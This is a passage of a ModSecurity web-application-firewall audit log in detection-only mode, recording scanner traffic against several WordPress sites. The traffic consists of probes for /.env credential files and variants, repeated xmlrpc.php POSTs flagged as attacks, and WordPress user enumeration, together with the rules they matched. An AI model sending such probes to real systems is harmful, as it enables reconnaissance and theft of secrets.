alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4R1xkoa9Lad8nP7KOBnAAAABA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749946839377386 959341 (- - -) Stopwatch2: 1749946839377386 959341; combined=2115, p1=354, p2=1330, p3=61, p4=44, p5=230, sr=96, sw=96, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1cd2710a-Z-- --06355d5e-A-- [15/Jun/2025:05:52:11.067020 +0530] aE4SMmydX8vZg3SgqNzImQAAAAI 167.250.235.41 57600 127.0.0.1 7081 --06355d5e-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 684 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --06355d5e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --06355d5e-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4SMmydX8vZg3SgqNzImQAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749946930057159 1009926 (- - -) Stopwatch2: 1749946930057159 1009926; combined=2270, p1=349, p2=1531, p3=70, p4=49, p5=167, sr=93, sw=104, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --06355d5e-Z-- --55014123-A-- [15/Jun/2025:05:53:35.756673 +0530] aE4Shhkoa9Lad8nP7KOB3gAAABA 185.177.72.144 40420 127.0.0.1 7081 --55014123-B-- GET /.env HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --55014123-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --55014123-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.pjsglobal.com"] [uri "/.env"] [unique_id "aE4Shhkoa9Lad8nP7KOB3gAAABA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749947014253090 1503666 (- - -) Stopwatch2: 1749947014253090 1503666; combined=1848, p1=425, p2=1319, p3=0, p4=0, p5=103, sr=109, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --55014123-Z-- --dfc45217-A-- [15/Jun/2025:05:53:37.671932 +0530] aE4SiPBViRrxRfhQ2sngUAAAAAE 185.177.72.144 40464 127.0.0.1 7081 --dfc45217-B-- GET /.env.bak HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --dfc45217-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --dfc45217-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.pjsglobal.com"] [uri "/.env.bak"] [unique_id "aE4SiPBViRrxRfhQ2sngUAAAAAE"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.pjsglobal.com"] [uri "/.env.bak"] [unique_id "aE4SiPBViRrxRfhQ2sngUAAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749947016195004 1476997 (- - -) Stopwatch2: 1749947016195004 1476997; combined=2046, p1=496, p2=1448, p3=0, p4=0, p5=101, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dfc45217-Z-- --30c24429-A-- [15/Jun/2025:05:53:39.571163 +0530] aE4SisQgjKnP_-nTjoBnGQAAAAM 185.177.72.144 40542 127.0.0.1 7081 --30c24429-B-- GET /.env.example HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --30c24429-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --30c24429-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.pjsglobal.com"] [uri "/.env.example"] [unique_id "aE4SisQgjKnP_-nTjoBnGQAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749947018106594 1464644 (- - -) Stopwatch2: 1749947018106594 1464644; combined=1973, p1=397, p2=1487, p3=0, p4=0, p5=89, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --30c24429-Z-- --879e0e5f-A-- [15/Jun/2025:05:53:41.523196 +0530] aE4SjFIoq-7Cj_2-ZLTQDwAAAAA 185.177.72.144 38432 127.0.0.1 7081 --879e0e5f-B-- GET /.env.local HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --879e0e5f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --879e0e5f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.pjsglobal.com"] [uri "/.env.local"] [unique_id "aE4SjFIoq-7Cj_2-ZLTQDwAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749947020010519 1512761 (- - -) Stopwatch2: 1749947020010519 1512761; combined=1716, p1=345, p2=1266, p3=0, p4=0, p5=104, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --879e0e5f-Z-- --08814c31-A-- [15/Jun/2025:05:53:43.438300 +0530] aE4SjcH4SeX80EzN5eWTOwAAAAs 185.177.72.144 38502 127.0.0.1 7081 --08814c31-B-- GET /.env.old HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --08814c31-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --08814c31-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.pjsglobal.com"] [uri "/.env.old"] [unique_id "aE4SjcH4SeX80EzN5eWTOwAAAAs"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.pjsglobal.com"] [uri "/.env.old"] [unique_id "aE4SjcH4SeX80EzN5eWTOwAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749947021961379 1477001 (- - -) Stopwatch2: 1749947021961379 1477001; combined=1671, p1=372, p2=1167, p3=0, p4=0, p5=132, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --08814c31-Z-- --32cd4105-A-- [15/Jun/2025:05:53:45.451575 +0530] aE4Sjx6N9C2vdY7GQBUt_AAAAAY 185.177.72.144 38570 127.0.0.1 7081 --32cd4105-B-- GET /.env.production HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --32cd4105-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --32cd4105-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.pjsglobal.com"] [uri "/.env.production"] [unique_id "aE4Sjx6N9C2vdY7GQBUt_AAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749947023955566 1496078 (- - -) Stopwatch2: 1749947023955566 1496078; combined=1938, p1=370, p2=1473, p3=0, p4=0, p5=94, sr=98, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --32cd4105-Z-- --a0b2543b-A-- [15/Jun/2025:05:53:45.586436 +0530] aE4SkCeXHcLENIHhuFctngAAAAU 167.250.235.41 38614 127.0.0.1 7081 --a0b2543b-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 699 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --a0b2543b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --a0b2543b-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4SkCeXHcLENIHhuFctngAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749947024593164 993346 (- - -) Stopwatch2: 1749947024593164 993346; combined=2378, p1=361, p2=1575, p3=81, p4=57, p5=186, sr=95, sw=118, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a0b2543b-Z-- --c33e0f45-A-- [15/Jun/2025:05:53:51.256009 +0530] aE4SlcH4SeX80EzN5eWTPgAAAAs 185.177.72.144 47704 127.0.0.1 7081 --c33e0f45-B-- GET /app/.env HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c33e0f45-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: https://www.pjsglobal.com/2018/07/10/environment-goals/ Cache-Control: private, must-revalidate Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --c33e0f45-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.pjsglobal.com"] [uri "/app/.env"] [unique_id "aE4SlcH4SeX80EzN5eWTPgAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749947029934517 1321589 (- - -) Stopwatch2: 1749947029934517 1321589; combined=1914, p1=381, p2=1416, p3=0, p4=0, p5=116, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c33e0f45-Z-- --20069812-A-- [15/Jun/2025:05:54:39.739766 +0530] aE4Sxj9o8tFLnaQ0S_4wLgAAAAQ 185.177.72.144 51480 127.0.0.1 7081 --20069812-B-- GET /laravel/.env HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --20069812-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: https://www.pjsglobal.com/2018/07/10/environment-goals/ Cache-Control: private, must-revalidate Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --20069812-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.pjsglobal.com"] [uri "/laravel/.env"] [unique_id "aE4Sxj9o8tFLnaQ0S_4wLgAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749947078390835 1349009 (- - -) Stopwatch2: 1749947078390835 1349009; combined=2013, p1=409, p2=1506, p3=0, p4=0, p5=98, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --20069812-Z-- --f4b1de3f-A-- [15/Jun/2025:05:55:25.951011 +0530] aE4S9MQgjKnP_-nTjoBnRAAAAAM 167.250.235.41 53020 127.0.0.1 7081 --f4b1de3f-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 686 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --f4b1de3f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --f4b1de3f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4S9MQgjKnP_-nTjoBnRAAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749947124833500 1117576 (- - -) Stopwatch2: 1749947124833500 1117576; combined=2452, p1=385, p2=1691, p3=64, p4=50, p5=164, sr=109, sw=98, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f4b1de3f-Z-- --0417bd62-A-- [15/Jun/2025:05:57:06.551959 +0530] aE4TWj9o8tFLnaQ0S_4waQAAAAQ 85.204.70.90 47424 127.0.0.1 7081 --0417bd62-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: 3econcepts.cstechns.com X-Real-IP: 85.204.70.90 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --0417bd62-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://3econcepts.cstechns.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --0417bd62-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||3econcepts.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||3econcepts.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "3econcepts.cstechns.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE4TWj9o8tFLnaQ0S_4waQAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/3econcepts.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749947226155866 396193 (- - -) Stopwatch2: 1749947226155866 396193; combined=2280, p1=343, p2=1848, p3=0, p4=0, p5=89, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0417bd62-Z-- --639efa67-A-- [15/Jun/2025:05:57:25.600137 +0530] aE4TbD9o8tFLnaQ0S_4wbgAAAAQ 167.250.235.41 40178 127.0.0.1 7081 --639efa67-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 698 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --639efa67-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --639efa67-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 